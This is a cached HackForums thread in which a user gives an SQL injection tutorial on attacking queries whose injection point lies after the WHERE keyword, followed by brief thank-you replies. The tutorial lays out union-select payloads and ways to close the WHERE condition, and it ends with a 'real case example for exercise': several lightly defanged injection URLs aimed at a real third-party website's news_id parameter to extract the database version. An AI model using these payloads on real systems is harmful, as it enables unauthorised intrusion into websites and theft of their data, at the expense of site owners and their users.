<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4082039" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4082039" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4082039</a>. It is a snapshot of the page as it appeared on 3 Apr 2014 20:22:48 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4082039" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:KJ8SVD-3tGAJ:www.hackforums.net/showthread.php%3Ftid%3D4082039&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] Injecting after "where" part (and before parameter value) - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] Injecting after &quot;where&quot; part (and before parameter value)"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4082039"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-03-2014, 12:22 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] Injecting after "where" part (and before parameter value)</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4082039" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/rating.js"></script><div id="success_rating_4082039" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4082039"><li style="width: 0%" class="current_rating" id="current_rating_4082039">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4082039&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4082039&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4082039&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4082039&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4082039&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4082039" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4082039_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4082039" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4082039&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4082039");
// -->
</script><div><strong>[SQLi tutorial] Injecting after "where" part (and before parameter value)</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid38554277" id="pid38554277"></a><table class="tborder" style="border-top-width: 0; " id="post_38554277" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-25-2014, 04:57 AM <span id="edited_by_38554277"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;pid=38554277#pid38554277">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a> </td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,195<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38554277">Thanks to hackforumspang's link finally I have found a site to demonstrate injection <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">after where part, but before parameter value.</span></span></span> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><br><span style="color: #FFA500;"><span style="font-weight: bold;"><span style="font-size: x-large;">Injection point can be at different places</span></span></span><br><br><span style="font-weight: bold;"><span style="color: #32CD32;"><span style="font-size: large;">after parameter's value (XX):</span></span></span><br><br><span style="color: #FFD700;">SELECT * FROM some_table WHERE some_column=XX</span><span style="color: #32CD32;">$injection_point$</span><br><br>where we get error like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>Database error: Invalid SQL: SELECT * FROM articles WHERE id=16'</code></div></div><br>In such cases usual SQL injection is used.<br><br><hr><br><span style="font-weight: bold;"><span style="font-size: large;"><span style="color: #32CD32;">injection in</span> <span style="color: #FFD700;">order by</span> <span style="color: #32CD32;">or</span> <span style="color: #FFD700;">limit</span><span style="color: #32CD32;"> part:</span></span></span><br><br><span style="color: #FFD700;">SELECT * FROM some_table WHERE some_condition LIMIT 0</span><span style="color: #32CD32;">$injection_point$</span><span style="color: #FFD700;">, 10</span><br><br>where we get error like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>1064 You have an error in your SQL syntax;<br>check the manual that corresponds to your MySQL server version for the right syntax to use near '\', 10' at line 1</code></div></div><br>In such cases follow tutorial from benzi <a href="http://www.hackforums.net/showthread.php?tid=2534578" target="_blank">http://www.hackforums.net/showthread.php?tid=2534578</a><br><br><hr><br><span style="font-weight: bold;"><span style="font-size: large;"><span style="color: #32CD32;">before</span><span style="color: #FFD700;"> where </span><span style="color: #32CD32;">part:</span></span></span><br><br><span style="color: #FFD700;">SELECT * FROM some_table</span> <span style="color: #32CD32;">$injection_point$</span> <span style="color: #FFD700;">WHERE some_column=XX </span><br><br>where we get error like:<br><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/0f285b487708a5e0450080eebaca6054.jpg" alt="[Image: 0f285b487708a5e0450080eebaca6054.jpg]" border="0"><br><br>In such cases follow my tutorial <a href="http://www.hackforums.net/showthread.php?tid=3509460" target="_blank">http://www.hackforums.net/showthread.php?tid=3509460</a><br><br><hr><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #32CD32;">after</span> <span style="color: #FFD700;">where</span> <span style="color: #32CD32;">part, but before parameter value</span>:</span></span><br><br>In such situation injection point is before parameter value like:<br><span style="color: #FFD700;">SELECT * FROM some_table</span> <span style="color: #FFD700;">WHERE some_column</span> <span style="color: #32CD32;">$injection_point$ </span><span style="color: #FFD700;">=XX </span><br><br>After we add <span style="font-weight: bold;"><span style="color: #FF0000;">'</span></span> after parameter to test for SQLi vulnerability we get an error like:<br><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/10dcda283a2989997e32c1bf74c21cf3.jpg" alt="[Image: 10dcda283a2989997e32c1bf74c21cf3.jpg]" border="0"><br><br>Form picture we can clearly see injection point <span style="color: #00BFFF;">after where part (and before parameter value)</span>.<br><br><span style="font-size: x-large;"><span style="color: #FFA500;"><span style="font-weight: bold;">So how can we inject in such cases?</span></span></span><br><br>Let's us analyze situation. We have an original query like<br><br><span style="color: #FFD700;">SELECT * FROM some_table WHERE some_column=XX</span><br><br>where we add our injection code like (for example I will use 3 columns):<br><br><span style="color: #32CD32;">and 0 union select 1,2,3-- -</span><br><br>After we inject our code complete query will be:<br><br><span style="color: #FFD700;">SELECT * FROM some_table WHERE some_column</span> <span style="color: #32CD32;">and 0 union select 1,2,3-- -</span> <span style="color: #FFD700;">=XX</span><br><br>Such injection will not work. We did everything by book, but it doesn't work <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><br><br><span style="font-size: x-large;"><span style="color: #FFA500;"><span style="font-weight: bold;">Why not?</span></span></span><br><br>If we are careful enough from code above we can see our <span style="color: #32CD32;"><span style="font-weight: bold;">-- -</span></span> is terminating complete where part:<br><br><span style="color: #FFD700;">where some_column = XX</span><br><br>We used <span style="color: #32CD32;"><span style="font-weight: bold;">-- -</span></span> to comment out remaining part of original query. So executed code was only part in <span style="color: #FFD700;">yellow</span> and <span style="color: #32CD32;">green</span>, but not <span style="color: #9400D3;">purple</span>:<br><br><span style="color: #FFD700;">where some_column</span> <span style="color: #32CD32;"><span style="font-weight: bold;">our injection with -- -</span></span><span style="color: #9400D3;">= XX</span><br><br>Last <span style="color: #9400D3;"><span style="font-weight: bold;">part</span></span> is not executed and where condition is not complete --&gt; that is why command doesn't work.<br><br>So solution to solve such situation is quite easy. We should complete where condition with some value like:<br><br><span style="color: #FFD700;">SELECT * FROM some_table WHERE some_column</span> <span style="color: #32CD32;">and 0 union select 1,2,3 &gt; 5-- -</span> <span style="color: #9400D3;">=XX</span><br><br>Bingo <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"> It works now... Last <span style="color: #9400D3;"><span style="font-weight: bold;">part</span></span> from original query is not needed any more because we closed <span style="color: #00BFFF;">where condition</span> with our value. We can close it on different ways adding something like:<br><br>&gt; xxx<br>is not null<br>is true<br>and 1<br>or 1<br>or 0<br>...<br><br>See real case example for exercise (Renegade already provided one possible syntax <a href="http://www.hackforums.net/showthread.php?tid=4049939&amp;pid=38225700#pid38225700" target="_blank">here</a>):<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">hxxp</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//wXw.svm[]oenke[]berg.d[]e/index.php?&amp;news_id=-136&nbsp;union&nbsp;select&nbsp;1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&nbsp;is&nbsp;not&nbsp;null--&nbsp;-&nbsp;<br></span></code></div></div></div>or<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">hxxp</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//wXw.svm[]oenke[]berg.d[]e/index.php?&amp;news_id=-136&nbsp;union&nbsp;select&nbsp;1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&nbsp;&gt;&nbsp;5--&nbsp;-&nbsp;<br></span></code></div></div></div>or<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">hxxp</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//wXw.svm[]oenke[]berg.d[]e/index.php?&amp;news_id=-136&nbsp;union&nbsp;select&nbsp;1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&nbsp;or&nbsp;0--&nbsp;-&nbsp;<br></span></code></div></div></div>or<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">hxxp</span><span style="color: #7AC07C">:</span><span style="color: #FFCCCC">//wXw.svm[]oenke[]berg.d[]e/index.php?&amp;news_id=-136&nbsp;union&nbsp;select&nbsp;1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&nbsp;and&nbsp;1--&nbsp;-&nbsp;<br></span></code></div></div></div><br>On
 site above we are not so lucky because it doesn't report error so we 
can't know where injection point is. So this strategy (from this 
tutorial) should be added to all other possible strategies you know when
 you want to inject on some site.<br><br>At site at the top where response was:<br><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/10dcda283a2989997e32c1bf74c21cf3.jpg" alt="[Image: 10dcda283a2989997e32c1bf74c21cf3.jpg]" border="0"><br><br>injection would work simply if we don't include <span style="color: #32CD32;"><span style="font-weight: bold;">-- -</span></span> part, because our injected code nicely coexists with original part:<br><br><span style="color: #FFD700;">SELECT * FROM resources WHERE book</span> <span style="color: #32CD32;">and 0 union select 1,2,3</span> <span style="color: #FFD700;">= '1' ORDER BY title ASC</span><br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_38554277"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039&amp;replyto=38554277" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38555323" id="pid38555323"></a><table class="tborder" style="margin-top: 5px; " id="post_38555323" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-25-2014, 06:08 AM <span id="edited_by_38555323"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;pid=38555323#pid38555323">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 20<br>Posts: 375<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">43</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38555323">Nice Trick again and another HQ-Tutorial for another injection_point!<br><br>THX for sharing! <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></div><div class="post_meta" id="post_meta_38555323"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="https://www.facebook.com/tech.prospect" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1846278" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039&amp;replyto=38555323" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38555988" id="pid38555988"></a><table class="tborder" style="margin-top: 5px; " id="post_38555988" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-25-2014, 07:18 AM <span id="edited_by_38555988"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;pid=38555988#pid38555988">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/thumbnail.jpg" alt="" height="95" width="54"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><span class="group2">makmaniac</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 8<br>Posts: 80<br>Joined: Feb 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1179043"><strong class="reputation_positive">11</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38555988">Thanks for another awesome tutorial .. some thing new for me .. <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_38555988"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1179043" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039&amp;replyto=38555988" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38558295" id="pid38558295"></a><table class="tborder" style="margin-top: 5px; " id="post_38558295" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-25-2014, 10:13 AM <span id="edited_by_38558295"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;pid=38558295#pid38558295">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1994305"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/759667hawk2.jpg" alt="" height="54" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1994305"><span class="group2">Blackhawk.</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 23<br>Posts: 286<br>Joined: Sep 2013<br>Reputation: <a 